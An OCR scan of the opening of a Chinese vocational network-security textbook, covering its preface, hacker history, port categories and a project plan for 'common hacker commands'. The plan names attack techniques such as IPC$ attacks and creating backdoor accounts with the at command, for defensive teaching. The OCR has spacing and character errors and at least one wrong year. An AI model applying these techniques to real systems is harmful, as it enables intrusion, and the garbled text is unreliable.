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内 容 简 介 
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FORSYORD 


本 书 第 1 版 出 版 以 来 ,受到 广大 师 生 的 欢迎 ,被 许多 高 职 院 校 选用 。“ 网 
络 安 全 部 署 " 课 程 成 为 省 级 资源 共享 建设 项 目 后 ,在 紧 扣 专业 教学 标准 、 教 
学 大 岗 及 课程 标准 的 基础 上 ,为 保持 教材 内 容 的 先进 性 ,充分 反映 学 科 最 新 
研究 成 果 和 产业 发 展 新 动态 ,在 广泛 征集 行业 专家 ,一 线 教师 和 学 生 的 意见 
和 建议 之 下 进行 配套 教材 修订 。 


1. 本 书 特 点 


(1) 实验 内 容 满足 操作 系统 升级 要 求 ,与 时 俱 进 求 发 展 。 实 验 环 境 中 的 
客户 机 系统 从 Windows XP 升级 到 Windows 7, 服 务 器 的 版 本 从 Windows 
Server 2003 升级 到 Windows Server 2012 ,删除 了 陈旧 的 内 容 , 增 加 了 渗透 
测试 平台 Kali Linux 的 安装 与 配置 ,利用 Kali 进行 信息 搜集 与 漏洞 扫描 、 
SQL 注入 攻击 、Linux 系统 加 固 、AAA 配置 的 讲解 ,丰富 了 教材 内 容 及 配套 
资源 。 

(2) 突破 实验 设备 品牌 单一 的 局 限 ,满足 更 多 学 习 者 的 实验 需求 。 在 学 
习 情 境 三 中 , 若 使 用 某 一 品牌 的 硬件 设备 ,在 教学 中 会 具有 一 定 的 产品 局 限 
性 。 本 书 的 设备 配置 实验 内 容 是 基于 Packet Tracer 和 eNSP 模拟 器 的 使 
用 ,降低 了 项 目 教学 对 网 络 硬 件 环 境 的 要 求 , 便 于 教材 的 使 用 。 

(3) 技能 大 赛 助 推 内 容 更 新 ,完善 教材 知识 体系 。 本 书 将 全 国 职业 技能 
大 赛 “ 信 息 安 全 技术 应 用 ”信息 安 全 管理 与 评估 ”* 云 安全 ” 赛 项 中 的 技能 操 
作 内 容 添 加 到 教材 中 。 全 国 职业 技能 大 赛 竞赛 项 目 是 企业 和 社会 需求 的 风 
向 标 ,比赛 内 容 常 涉及 最 新 技术 和 核心 内 容 , 本 书 内 容 与 大 赛 内 容 相 衔接 ， 
引入 大 赛 中 最 新 技术 和 经 典 案例 ,促进 学 校 与 企业 的 深度 结合 ,让 学 生 熟 练 
掌握 核心 和 前 沿 技术 。 

(4) 职业 资格 考证 是 对 教育 教学 改革 成 果 、 对 教材 修订 水 平和 质量 的 检 
验 。 在 本 书 的 过 关 练 习 中 ,增加 了 职业 资格 认证 CCNA、HCNA、CCNP 和 
HCNP 涉及 的 网 络 安全 知识 ,为 学 生成 为 网 络 安全 管理 员 、 网 络 安全 工程 师 
搭建 桥梁 。 


2. 配套 资源 
本 书 是 基于 工作 过 程 导向 的 教 .学 、 做 一 体 化 的 工学 结合 教材 , 集 项 目 
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教学 与 实 训 为 一 体 , 便 于 教师 通过 “创设 情境 ,引出 任务 “ 师 生 互动 ,分 析 任 务 ”“ 新 知 引 
入 ,分 解 任务 “分 组 合作 ,完成 任务 “检查 结果 ,多 维 反馈 ”和 “总 结 点 评 , 拓 展 提高 ”六 个 
步骤 完成 引导 教学 。 

本 书 是 省 级 资源 共享 课程 建设 项 目的 配套 教材 ,教学 资源 丰富 ,所 有 实 训 指导 资料 、 
学 习 指 南 .教学 录像 和 实验 视频 全 部 放 在 课程 网 站 上 , 供 下 载 学 习 和 在 线 收 看 。 本 书 配套 
的 电子 课件 ,课程 标准 ,授课 计划 工具 软件 和 试题 答案 等 教学 资源 ,任课 教师 可 登录 清华 
大 学 出 版 社 网 站 (www. tup. com. cn) 免 费 下 载 ,也 可 与 编著 者 联系 索取 基本 教学 资源 
(E-mail: 85036@ qq. com) 。 





3. 合作 与 致谢 


全 书 由 郭 琳 编写 。 在 本 书 的 编写 过 程 中 ,得 到 了 北京 信息 职业 技术 学 院 、 上 海信 息 职 
业 技术 学 院 、 清 华 大 学 网 络 科学 与 网 络 空间 研究 院 、 深 圳 职业 技术 学 院 、 广 东 科 学 技术 职 
业 学 院 .广东 技术 师范 学 院 . 乐 山 职业 技术 学 院 .广州 国 为 信息 科技 有 限 公司 .广州 中 星 信 
息 技 术 服 务 股份 有 限 公司 、 星 网 锐 捷 网 络 股份 有 限 公司 等 兄弟 院 校 和 企 事业 单位 的 大 力 
支持 ,在 这 里 一 并 表示 感谢 ;另外 向 朱 义 勇 、 张 宇 辉 、 斤 发 根 、 李 军 、 钟 名 春 、 池 瑞 楠 、 王 隆 
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学 习 


情境 一 


常见 网 络 攻击 分 析 


随 着 互联 网 的 飞速 发 展 ,网 络 的 安全 问题 也 显得 日 益 重 要 。 每 一 台 与 互联 网 连接 的 
计算 机 都 有 可 能 成 为 黑客 的 攻击 对 象 。 对 于 那些 防范 意识 较 差 或 者 对 网 络 安全 不 甚 了 解 


的 用 户 ,都 极 


易 成 为 黑客 攻击 的 目标 。 当 计算 机 用 户 上 网 聊天 浏览 网 页 .下 载 文件 时 ,无 


论 是 登录 账号 .密码 ,还 是 电子 邮件 ,甚至 涉及 商业 秘密 的 文档 都 有 可 能 被 黑客 偷 宇 。 学 
习 情 境 一 主要 对 黑客 的 定义 历史 、 常 用 的 攻击 工具 及 手段 做 了 详尽 的 叙述 ,以 实际 的 案 


例 ,带领 大 家 
防护 策略 ,让 


进入 黑客 的 世界 ,以 实例 的 方式 让 人 们 了 解 黑客 的 攻击 手法 ,从 而 采取 各 种 
黑客 无 从 下 手 , 让 系统 更 为 安全 。 


黑客 技术 就 像 一 把 双 面 的 利刃 , 它 可 以 人 侵 他 人 的 计算 机 ,但 是 人 们 也 可 以 通过 了 解 


黑客 人 侵 的 了 





F 段 ,掌握 如 何 防护 自己 的 计算 机 ,以 保护 计算 机 不 受 他 人 的 入 侵 。 通 过 本 学 


习 情 境 所 有 项 目的 实践 ,揭秘 黑客 攻击 的 手法 ; 盘点 包括 常见 的 黑客 命令 .端口 扫描 与 人 


侵 、 局 域 网 咱 


探 、 远 程控 制 , 拒 绝 服务 攻击 等 当前 比较 流行 的 黑客 入 侵 技术 ; 让 大 家 对 常 


见 的 网 络 攻击 手段 了 如 指 掌 ; 使 用 攻防 互 渗 的 防御 方法 ,全 面 确保 用 户 的 网 络 安全 。 
本 学 习 情境 需要 完成 的 项 目 有 : 


项 目 1 
项 目 2 
项 目 3 
项 目 4 
项 目 5 
项 目 6 
项 目 7 
项 目 8 
项 目 9 


常用 黑客 命令 的 使 用 

黑客 操作 系统 Kali Linux 的 安装 与 设置 
利用 Kali Linux 收集 及 利用 信息 

漏洞 扫描 

密码 破解 

网 络 监听 工具 的 使 用 

远程 控制 

拒绝 服务 攻击 

SQL 注入 攻击 





1.1 用 户 需求 与 分 析 


提起 网 络 安全 问题 ,人 们 便 不 由 自主 地 联想 到 黑客 ,将 他 们 和 破坏 网 络 安全 、 盗 取 网 
络 账户 等 问题 联系 起 来 。 由 于 少数 高 水 平 的 黑客 可 以 随意 入 侵 他 人 的 计算 机 ,并 在 被 攻 
击 者 毫 不 知晓 的 情况 下 窃取 计算 机 中 的 信息 后 悄悄 退出 ,于 是 人 们 对 此 产生 了 较 强 的 好 
奇 心 和 学 习 黑 客 技术 的 欲望 ,并 在 了 解 黑客 攻击 技术 之 后 不 计 后 果 地 进行 尝试 ,给 网 络 带 
来 了 极 大 的 威胁 。 黑 客 进行 攻击 的 常见 理由 有 : 想 在 别人 面前 炫耀 一 下 自己 的 技术 ,让 
别人 更 崇拜 自己 ; 看 不 惯 某 人 、 某 单位 的 某 些 做 法 ,攻击 他 的 计算 机 算是 一 种 教训 ; 纯粹 
为 了 好 玩 、 恶 作 剧 ; 练习 ,为 了 成 为 一 个 高 手 做 实验 ; 窃取 数据 ,谋取 经 济 利益 。 其 实 黑 
客 及 黑客 技术 并 不 神秘 ,也 不 高 深 。 一 个 普通 的 网 民 在 具备 了 一 定 的 基础 知识 后 ,也 可 以 
成 为 一 名 黑客 。 黑 客 技术 是 一 把 双 刃 剑 , 通 过 它 既 可 以 人 侵 他 人 的 计算 机 ,又 可 以 了 解 黑 
客 的 入侵 手段 ,掌握 保护 计算 机 、 防 范 和 人 侵 的 方法 。 在 学 习 黑 客 技术 时 ,应 该 首先 明确 学 
习 的 正确 目的 。 

DOS(Disk Operating System, 磁 盘 操作 系统 ) 操 作 系统 采用 命令 提示 符 界面 ,直接 运 
行 系统 中 的 命令 提示 符 来 完成 。 在 使 用 DOS 时 ,所 有 的 核心 启动 程序 都 被 临时 存储 在 内 
存 中 ,用 户 可 以 随意 使 用 。 黑 客 在 人 侵 的 过 程 中 会 使 用 各 种 网 络 命令 进行 探测 并 获得 信 
息 , 这 些 命令 也 是 黑客 入 门 最 基本 的 要 求 。 熟 练 使 用 这 些 命 令 , 将 为 信息 收集 和 安全 防御 
带 来 极 大 便利 。 在 这 一 项 目 里 将 介绍 黑客 常用 的 一 些 命令 。 


1.2 预备 知识 
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随 着 信息 科技 的 迅速 发 展 以 及 计算 机 网 络 的 普及 ,计算 机 网 络 深入 国家 的 政府 、 军 
事 文教 金融. 商 业 等 诸多 领域 ,可 以 说 网 络 无 处 不 在 。 资 源 共享 和 计算 机 网 络 安全 
一 直 作为 一 对 矛盾 体 而 存在 着 ,计算 机 网 络 资源 共享 进一步 加 强 , 信 息 安 全 问题 日 益 
突出 。 
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2017 年 1 月 22 日 ,中 国 互联 网 络 信息 中 心 (CNNIC) 在 北京 发 布 第 39 次 (中 国 互联 
网 络 发 展 状况 统计 报告 》，, 如 图 1-1 所 示 。 报 告 显示 ,截至 2016 年 12 月 底 , 中 国 网 民 规模 
达到 7. 31 亿 , 全 年 新 增 网 民 4299 万 人 ,增长 率 为 6.2%。 中 国 网 民 规模 已 经 相当 于 欧洲 
人 口 总 量 。 互 联网 普及 率 较 上 年 提升 2. 9 个 百分点 ,达到 53. 2%, 超 过 全 球 平均 水 平 
3. 1 个 百分点 ,超过 亚洲 平均 水 平 7. 6 个 百分点 。 手 机 网 民 达 到 6. 95 亿 , 增 长 率 连续 3 年 
超过 10%。 台 式 计算 机 ,笔记 本 电脑 的 使 用 率 均 出 现下 降 , 手 机 不 断 挤占 其 他 个 人 上 网 
设备 的 使 用 。2016 年 ,我 国手 机 网 上 支付 用 户 规模 增长 迅速 ,达到 4. 69 亿 , 年 增长 率 为 
31.2% ,网 民 手机 网 上 支付 的 使 用 比例 从 57.7% 提 升 至 67. 5%, 有 50.3% 的 网 民 在 线 下 
实体 店 购物 时 使 用 手机 支付 结算 。 三 成 网 民 使 用 线 上 政务 办 事 , 互 联网 推动 服务 型 政府 
建设 及 信息 公开 。 截 至 2016 年 12 月 底 ,中 国 域名 总 数 达 到 4228 万 个 ,国家 顶级 域名 
.cn 的 注册 量 达 到 2061 万 个 , 占 中 国 域名 总 数 的 78.7%。 我 国境 内 外 上 市 互联 网 企业 数 
量 达 到 91 家 ,总 体 市 值 为 5.4 万 亿 元 人 民 币 ,其 中 腾讯 公司 和 阿里 巴巴 公司 的 市 值 总 和 
超过 3 万 亿 元 人 民 币 。 企 业 的 计算 机 使 用 、 互 联网 使 用 以 及 宽带 接 入 已 全 面 普及 ,分 别 达 
到 99% .95.6% 和 93.7% ,企业 在 线 销 售 、 在 线 采购 的 开展 比例 实现 10 个 百分点 的 增长 ， 
分 别 达到 45. 3% 和 45. 6% ,互联 网 营销 推广 比例 达 38. 7%, 有 六 成 企业 建 有 信息 化 系 
统 , 相 比 去 年 提高 13. 4 个 百分点 。 
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图 1-1 “中 国 互联 网 络 信息 中 心 " 网 站 


网 络 应 用 已 经 渗透 到 现代 社会 生活 的 各 个 方面 ,包括 电子 商务 、 电 子 政务 、 电 子 银行 
等 领域 。 至 今 ,网 络 安全 不 仅 成 为 商家 关注 的 焦点 ,也 是 技术 研究 的 热门 领域 ,同时 也 是 
国家 和 政府 的 行为 。 信 息 安 全 空间 成 为 传统 的 国界 领海、 领空 三 大 国防 和 基于 太空 的 第 
四 国防 之 外 的 第 五 国防 ,“ 国 家 互联 网 应 急 中 心 ”网 站 如 图 1-2 所 示 。 
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图 1-2 “国家 互联 网 应 急 中 心 "网 站 


国家 计算 机 网 络 应 急 技 术 处 理 协调 中 心 ( 简 称 CNCERT/CC) 在 2017 年 2 月 发 布 的 
《CNCERT 互联 网 安全 威胁 报告 ) 中 指出 , 2017 年 2 月 我 国 基础 网 络 运行 总 体 平稳 ,未 发 
生 较 大 规模 网 络 安全 事件 ,但 存在 一 定数 量 的 流量 不 大 的 针对 互联 网 基础 设施 的 拒绝 服 
务 攻击 事件 。 政 府 网 站 和 人 金融 行业 网 站 仍然 是 不 法 分 子 攻击 的 重点 目标 ,安全 漏洞 是 重 
要 联网 信息 系统 遭遇 攻击 的 主要 内 因 。 在 网 络 病毒 活动 情况 方面 ,境内 感染 网 络 病毒 的 
终端 数 约 为 118 万 个 。2017 年 2 月 境内 近 66 万 个 IP 地 址 对 应 的 主机 被 木马 或 僵尸 程序 
控制 , 按 地 区 分 布 感染 数量 排名 前 三 位 的 分 别 是 广东 省 .江苏 省 和 河南 省 。 木 马 或 僵尸 网 
络 控制 服务 器 IP 总 数 为 14489 个 ,其 中 ,境内 木马 或 僵尸 网 络 控制 服务 器 IP 数量 为 
10030 个 , 按 地 区 分 布 数量 排名 前 三 位 的 分 别 是 广东 省 、 山 东 省 .浙江 省 。 境 外 木马 或 伪 
尸 网 络 控制 服务 器 IP 数量 为 4459 个 ,主要 分 布 于 美国 、 俄 罗斯 、 日 本 。 其 中 位 于 美国 的 
控制 服务 器 控制 了 境内 313300 个 主机 IP, 控 制 境内 主机 IP 数量 居 首 位 ,其 次 是 位 于 中 
国 台 湾 和 荷兰 的 IP 地 址 ,分 别 控制 了 境内 23964 个 和 23683 个 主机 也。 其 中 ,境内 8904 万 
个 用 户 感染 移动 互联 网 恶意 程序 , 按 地 区 分 布 感染 数量 排名 前 三 位 的 分 别 是 广东 省 .四川 
省 和 上 海 市 。 恶 意 程序 累计 传播 32 万 次 。 各 安全 企业 报 送 的 恶意 代码 捕获 数量 中 ,瑞星 
公司 截获 的 新 增 病 毒 种 类 较 上 月 增长 29. 1% , 猜 豹 移动 报 送 的 计算 机 病毒 事件 数量 较 上 
月 下 降 2.3%; 在 网 站 安全 方面 ,本 月 境内 被 自 改 网 站 数量 为 4493 个 ,其 中 被 自 改 的 政府 
网 站 165 个 , 占 境内 被 自 改 网 站 的 3. 7%。 境 内 被 自 改 网 站 数量 按 地 区 分 布 排名 前 三 位 
的 分 别 是 广东 省 ,北京 市 .河南 省 。 按 网 站 类 型 统计 ,被 自 改 数量 最 多 的 是 . com 域名 类 网 
站 ,其 多 为 商业 类 网 站 ,被 自 改 的 . gov 域名 类 网 站 有 165 个 , 占 境 内 被 自 改 网 站 的 
3.7%。 境 内 被 植 人 后门 的 网 站 数量 为 3228 个 ,境内 被 植 人 后 门 的 网 站 数量 按 地 区 分 布 
排名 前 三 位 的 分 别 是 广东 省 、 北 京 市 .河南 省 。 按 网 站 类 型 统计 ,被 植 入 后 门 数量 最 多 的 
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是 . com 域名 类 网 站 ,多 为 商业 网 站 ,被 植 人 后 门 的 政府 网 站 有 109 个 , 占 境内 被 植 和 后门 
网 站 的 3. 4%。 境 外 2450 个 IP 地 址 通过 植 入 后 门 对 境内 3090 个 网 站 实施 远程 控制 。 针 
对 境内 网 站 的 仿冒 页 面 数 量 为 2120 个 ,涉及 域名 1717 个 ,IP 地 址 552 个 ,平均 每 个 人 PP 地 
址 承载 4 个 仿冒 页 面 ,这 些 仿 冒 页 面 绝 大 多 数 是 仿冒 我 国 金融 机 构 和 著名 社会 机 构 。 这 
552 个 IP 中 ,94.0% 位 于 境外 ,主要 位 于 中 国 香港 和 美国 。 安 全 漏洞 方面 ,国家 信息 安全 
漏洞 共享 平台 (CCNVD) 收 集 整 理 信息 系统 安全 漏洞 998 个 ,其 中 ,高 危 漏 洞 388 个 ,可 被 
利用 来 实施 远程 攻击 的 漏洞 有 893 个 。 受 影响 的 软 硬 件 系统 厂商 包括 Adobe、CISCO、 
Drupal、Google、IBM、Microsoft、Mozilla、WordPress 等 。 按 漏洞 类 型 排名 前 三 位 的 分 别 
是 应 用 程序 漏洞 .Web 应 用 漏洞 .操作 系统 漏洞 ; 事件 受理 方面 ,2017 年 2 月 CNCERT 
接收 网 络 安全 事件 报告 7309 件 ,数量 排名 前 三 位 的 分 别 是 漏洞 .恶意 程序 和 网 页 
仿冒 。 


122 黑客 的 定义 


黑客 是 对 英语 hacker 的 翻译 ,hacker 原意 是 指 用 和 估 头 砍 此 的 工人 ,最 早 被 引进 IT 世 
界 则 可 追溯 自 20 世纪 60 年 代 。 他 们 破解 系统 或 者 网 络 基本 上 是 一 项 业余 嗜好 ,通常 是 
出 于 自己 的 兴趣 ,而 非 为 了 赚钱 或 工作 需要 。 当 时 麻 省 理工 学 院 C(MIT) 的 学 生 通 常 分 为 
两 派 : 一 派 是 tool, 意 指 “ 乖 乖 学 生 ”, 成 绩 都 拿 甲 等 ; 另 一 派 则 是 所 谓 的 hacker, 也 就 是 常 
逃课 ` 上 课 爱 睡 觉 ,但 晚上 却 又 精力 充沛 喜欢 搞 课 外 活动 的 学 生 。 真 正 一 流 hacker 并 非 
整 天 不 学 无 术 ,而 是 会 热衷 追求 某 种 特殊 嗜好 ,比如 研究 电话 ,无线 电 , 或 者 是 计算 机 。 也 
因此 后 来 才 有 所 谓 的 computer hacker 出 现 , 意 指 计算 机 高 手 。 有 些 人 很 强调 黑客 和 骇 
客 的 区 别 , 认 为 黑客 是 有 建设 性 的 ,而 骇 客 则 专门 搞 破坏 。 对 一 个 黑客 来 说 ,学 会 人 侵 和 
破解 是 必要 的 ,但 最 主要 的 还 是 编程 。 对 于 一 个 骇 客 来 说 ,他 们 只 追求 人 侵 的 快感 ,不 在 
乎 技术 ,他 们 不 会 编程 ,不 知道 人 侵 的 具体 细节 。 还 有 一 群 人 被 称 作 * 白 帽 黑客 或 “匿名 
客 ”(sneaker) 或 “ 红 客 ”, 他 们 通常 是 信息 安全 公司 的 雇员 ,并 在 完全 合法 的 情况 下 攻击 某 
系统 。 他 们 的 工作 是 试图 破解 某 系统 或 网 络 以 提醒 该 系统 所 有 者 系统 的 安全 漏洞 。 


123 黑客 的 历史 


黑客 的 早期 历史 可 以 追溯 到 20 世纪 五 六 十 年 代 , 麻 省 理工 学 院 C(MIT) 率 先 研制 出 
“分 时 系统 ”, 学 生 们 第 一 次 拥有 了 自己 的 计算 机 系统 。 不 久之 后 ,学 生 们 中 出 现 了 一 批 狂 
热 分 子 , 称 自己 是 黑客 ,他 们 要 彻底 破坏 大 型 主机 的 控制 。 

1961 年 拉 塞 尔 的 三 位 大 学 生 编 写 了 第 一 游戏 程序 “空间 大 战 “"。 其 他 学 生 也 纷纷 纺 
写 出 更 多 好 玩 的 游戏 ,比如 象棋 程序 、 留 言 软件 等 。 他 们 属于 第 一 代 黑 客 ,开发 了 大 量 有 
实用 价值 的 应 用 程序 。 

20 世纪 60 年 代 中 期 ,贝尔 实验 室 的 邓 尼 斯 。 里 奇 和 肯 “。 汤姆 森 编写 出 UNIX 操 
作 系 统 和 C 语言 ,推动 了 工作 者 计算 机 和 网 络 的 成 长 。MIT 的 理 查 德 。 斯 德尔 曼 成 立 
了 自由 软件 基金 会 ,成 为 国际 自由 软件 运动 的 精神 领袖 。 他 们 是 第 二 代 黑 客 的 代表 
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人 物 。 

1975 年 ,爱德华 。 罗 伯 茨 发 明 第 一 台 微 型 计算 机 。 美 国 的 计算 机 爱好 者 组 织 成 立 了 
“家 庭 酿造 计算 机 俱乐部 ”, 相 互 交流 组 装 计算 机 的 经 验 , 他 们 属于 第 三 代 黑 客 。 

1970 年 ,约翰 。 达 帕 尔 利 用 口哨 玩具 开启 电话 系统 ,进行 免费 的 长 途 通话 。 因 盗用 
电话 线路 而 多 次 被 捕 。 

1982 年 年 仅 15 岁 的 凯 文 。 米 特 尼 闻 和 人 了 北美 空中 防务 指挥 系统 ,这 是 首次 发 现 的 
从 外 部 人 侵 的 网 络 事件 。 他 后 来 连续 进入 美国 多 家 大 公司 的 计算 机 网 络 ,1944 年 向 圣 迭 
戈 超 级 计算 机 中 心 发 动 攻击 。 他 是 著名 的 世界 头号 黑客 , 曾 多 次 人 狱 ,被 指控 偷窃 了 数 以 
千 计 的 文件 并 非法 使 用 多 张 信 用 卡 。 

1984 年 ,德国 汉堡 出 现 了 混沌 计算 机 俱乐部 (CCC) ,1987 年 ,CCC 的 成 员 攻 入 了 美 
国 宇航 局 的 SPAN 网 络 。 美 国 黑客 戈 德 斯 坦 创办 了 著名 的 黑客 杂志 : The Hack 
Quarterly 。 

1988 年 ,美国 康 奈 尔 大 学 学 生 罗 伯 特 。 莫 里 斯 向 互联 网 释放 蠕虫 病毒 ,导致 10% 以 
上 的 网 络 计算 机 同时 出 现 故 障 , 造 成 用 户 直 接 经 济 损失 近 1 亿美 元 。 

1995 年 ,俄罗斯 黑客 列 文 在 英国 被 捕 。 他 被 指控 从 纽约 花旗 银行 非法 转移 至 少 
370 万 美元 。 

1999 年 ,美国 黑客 戴 维 ， 斯 密斯 制造 了 梅 丽 莎 病毒 ,通过 互联 网 在 全 球 感染 数 百 万 
台 计 算 机 和 数 万 台 服 务 器 。 

2000 年 ,全 世界 黑客 联手 发 动 的 黑客 战争 ,袭击 了 互联 网 最 热门 的 八大 网 站 ,包括 
Yahoo 和 微软 ,造成 网 站 瘫痪 数 小 时 ,17 亿美 元 的 经 济 损失 。 菲 律 宾 学 生 奥 内 尔 。 古 效 
曼 制 造 的 爱 虫 病毒 , 因 计 算 机 瘫痪 造成 的 经 济 损失 高 达 100 亿美 元 。 


124 端口 概述 


端口 是 计算 机 与 外 界 通信 交流 的 出 口 。 根 据 端口 的 性 质 可 以 分 为 以 下 三 类 。 

(1) 公认 端口 ,也 称 为 “常用 端口 "。 范 围 为 0 一 1023 ,它们 紧密 绑 定 于 一 些 特定 的 服 
务 。 通 常 这 些 端口 的 通信 能 够 明确 地 表明 某 种 服务 的 协议 ,这 种 端口 是 不 可 以 被 其 他 的 
协议 所 占用 的 。 例 如 21 端口 就 是 FTP( 文 件 传送 协议 ) 的 端口 ,23 号 端口 则 是 Telnet 服 
务 专用 的 ,而 80 端口 实际 是 HTTP 通信 所 使 用 的 ,这 些 端口 通常 不 会 被 黑客 程序 利用 。 

(2) 注册 端口 的 范围 是 1024 一 49151。 它 们 分 散 地 绑 定 于 一 些 服务 ,也 就 是 说 有 很 多 
服务 绑 定 于 这 些 端口 ,这 些 端口 同样 用 于 许多 其 他 目的 。 这 些 端口 大 多 数 没有 明确 的 定 
义 服 务 对 象 ,不 同 的 程序 可 以 根据 实际 需要 自行 定义 。 

(3) 动态 和 私有 端口 号 的 范围 是 49152 一 65535 ,理论 上 不 应 该 把 常用 服务 分 配 在 这 
些 端口 上 。 但 实际 上 有 些 较 为 特殊 的 程序 ,特别 是 一 些 木马 程序 就 非常 喜欢 用 这 些 端口 ， 
因为 这 些 端口 一 般 不 被 引起 注意 ,非常 容易 隐蔽 。 
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1.3 方案 设计 


方案 设计 如 表 1-1 所 示 。 
表 1-1 方案 设计 





任务 名 称 常用 黑客 命令 的 使 用 


1. 熟悉 黑客 常用 的 DOS 命令 

(1) 了 解 DOS 命令 的 格式 

(2) 熟悉 黑客 常用 的 目录 操作 命令 

(3) 熟练 掌握 黑客 常用 的 文件 操作 命令 

2. 掌握 黑客 常用 的 网 络 命令 

(1) 使 用 net 命令 发 动 IPC$ 攻击 

(2) 利用 telnet 命令 进行 远程 登录 

(3) 利用 计划 管理 程序 at 命令 创建 后 门 账号 

(4) 利用 arp 命令 防范 ARP 攻击 

(5) 使 用 netstat 命令 查看 计算 机 是 否 “ 身 处 险 境 ” 
(6) 利用 tracert 命令 确定 访问 目标 通过 的 路 径 

(7) 使 用 route 命令 查看 修改 路 由 条 目 

1. 能 使 用 dir.cd .md ,rd 命令 进行 目录 操作 

2. 能 使 用 copy\type ,ren del 命令 进行 文件 操作 

3. 能 使 用 netstat 命令 查看 网 络 状态 

4. 能 使 用 net user 命令 显示 修改、 添加 或 删除 账户 
5. 能 使 用 net localgroup 命令 提升 .降低 账户 权限 
6 
7 
8 
9 





任务 分 解 





.能 使 用 net share 命令 创建 .删除 共享 资源 
.能 使 用 net view 命令 显示 域 列表 、 计 算 机 列表 或 指定 计算 机 共享 资源 列表 
.能 使 用 net use 命令 建立 IPC$ 通道 

. 能 使 用 telnet 命令 远程 登录 其 他 计算 机 

10. 能 使 用 arp 命令 显示 和 修改 本 地 arp 列表 

11. 能 使 用 at 命令 在 指定 时 间 运 行 命令 和 程序 
12. 能 使 用 netstat 命令 显示 计算 机 的 连接 状态 
13. 能 使 用 tracert 命令 显示 途径 路 由 器 的 IP 地 址 
14. 能 使 用 route 命令 显示 、 添 加 和 删除 路 由 条 目 
.了解 网 络 安全 的 重要 意义 

. 熟悉 黑客 的 定义 

. 了解 黑客 的 发 展 历史 

. 熟悉 黑客 人 侵 的 一 般 过 程 

. 了 解 端口 的 作用 和 分 类 

. 掌握 网 络 安全 行业 的 基本 情况 

. 培养 良好 的 职业 道德 

. 培养 创新 能 力 

. 树立 较 强 的 安全 节约、 环保 意识 

. 培养 良好 的 沟通 与 团队 协作 能 力 


能 力 目标 





知识 目标 





素质 目标 





am own 








[ 项目 1 常用 黑客 命令 的 使 用 ] 量 





1.4 项 目 实 施 


一 般 来 说 ,黑客 对 计算 机 进行 攻击 的 步骤 大 致 相同 ,主要 包括 扫描 漏洞 .试探 漏洞 取 
得 权限 与 提升 权限 、 木 马 人 侵 、 建 立 后 门 与 清理 痕迹 。 其 中 扫描 系统 开放 的 端口 .创建 用 
户 、 提 升 用 户 权限 等 操作 均 可 以 使 用 系统 自 带 命令 完成 。 


141 任务 1: 熟悉 黑客 常用 的 DOS 命 令 
1. 任务 目标 


DOS 命令 是 黑客 们 必须 掌握 的 技能 ,黑客 人 侵 系统 后 ,对 目录 和 文件 的 操作 是 必 不 
可 少 的 ,下 面 简单 介绍 一 下 黑客 常用 的 目录 和 文件 操作 命令 。 


2. 工作 任务 


(1) 了 解 DOS 命令 的 格式 。 
(2) 熟悉 黑客 常用 的 目录 操作 命令 。 
(3) 熟练 掌握 黑客 常用 的 文件 操作 命令 。 


3. 工作 环境 
一 台 预 装 Windows 7 系统 的 主机 。 
4. 实施 过 程 


1) 了 解 DOS 命令 的 格式 
DOS 命令 的 语法 格式 如 下 。 


[< 盘 符 >][< 路 径 >]< 命 令 名 >[< 开 关 >][< 参 数 >] 


其 中 ,[ 志 盘 符 二 ] 就 是 DOS 命令 所 在 盘 符 。 [一 路径 二 ] 是 DOS 命令 所 在 具体 位 置 ， 
若 使 用 系统 自 带 的 DOS 命令 则 [二 盘 符 二 ][ 二 路 径 二 ] 两 项 一 般 可 以 省 略 。 一 命令 名 二 
决定 命令 执行 的 功能 ,是 MS-DOS 命令 中 不 可 缺少 的 部 分 。[ 二 开关 二 ] 通 常 是 一 个 字母 
或 数字 ,用 于 指定 命令 实施 操作 的 方式 ,开关 前 要 使 用 一 个 斜 枉 /。 例 如 dir 命令 中 使 用 
开关 /P 来 分 屏 显 示 文 件 列表 。[ 到 参数 二] 通常 用 于 指定 操作 的 具体 对 象 , 有 些 命令 可 能 
需要 多 个 参数 ,有 些 命令 可 能 不 需要 参数 ,例如 清 屏 命令 cls。 需 要 注意 的 是 DOS 命令 不 
分 大 小 写 。 

2) 熟悉 黑客 常用 的 目录 操作 命令 

黑客 常用 的 目录 操作 命令 有 dir.cd、md、rd 等 ,下 面 一 一 详细 介绍 。 

(1) dir 命令 。dir 命令 是 英文 单词 Directory( 目 录 ) 的 缩写 ,功能 是 显示 一 个 磁盘 上 
全 部 或 部 分 文件 目录 ,显示 的 文件 信息 包括 文件 名 、 扩 展 名 、 文 件 长 度 、 修 改 日 期 和 时 间 
等 ,但 不 显示 文件 的 具体 内 容 。 命 令 dir C:\Windows\ 可 以 查看 指定 文件 夹 下 的 文件 ,其 
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效果 与 在 C:\Windows 下 执行 dir 命令 完全 一 样 。 命 令 dir/p 可 以 分 屏 和 分 栏 显示 文件 ， 
效果 如 图 1-3 所 示 。 若 计算 机 显示 完 一 屏 内 容 后 ,暂停 下 来 ,在 屏幕 底部 有 一 行 英文 
“press any key to continue...”, 它 的 中 文 含义 是 “ 按 任意 键 继续 ...”, 此 时 按键 盘 上 任意 键 
即 可 继续 显示 下 一 屏 。 若 要 完整 显示 当前 目录 ,可 以 使 用 /w 参数 ,该 参数 将 文件 的 大 小 
和 生成 时 间 均 省 略 ,可 以 显示 更 多 的 文件 和 文件 夹 。 如 果 不 知 道 文件 的 具体 位 置 ,可 以 使 
用 /s 来 查找 ,例如 命令 dir/s bears. jpg 可 以 查找 bears. jpg 文件 。 直 接 使 用 dir 命令 看 不 
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3 same Ddin/ash 
驱动 器 c 中 的 车 没有 标签 
的 序列 号 是 196B-D81E 






casersAel 的 目录 


O15 /97/95 17:49 -<DIR> AppData 
OS/87/85 17:49 <JUNCTION> Application Data [C:\sers\gl[ 


1 
OS /7/05 17:49 <JUNCTION> Cookies [C:\lsers\gl\AppData\ = 
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ER - 
ee 









C:Nlsers\gl\AppData\Local\Nicrosoft\nternet Explorer 的 目录 





15 /11/24 11:84 S918 hrndlog.txt 
1 个 5.918 字 节 





文件 





(ey 
图 1-3 dir 命令 应 用 举例 





[ 项目 1 常用 黑客 命令 的 使 用 ] @ 





到 当前 目录 中 隐藏 文件 和 系统 文件 ,使 用 命令 dir/a:h 可 以 显示 当前 目录 下 的 隐藏 文件 。 
DOS 命令 支持 使 用 通配符 ,因此 可 以 使 用 dir 命令 查找 和 显示 某 一 类 文件 ,例如 要 显示 所 
有 扩展 名 为 . txt 的 文件 ,可 以 使 用 命令 dir/s * . txt, 效 果 如 图 1-3 所 示 。 

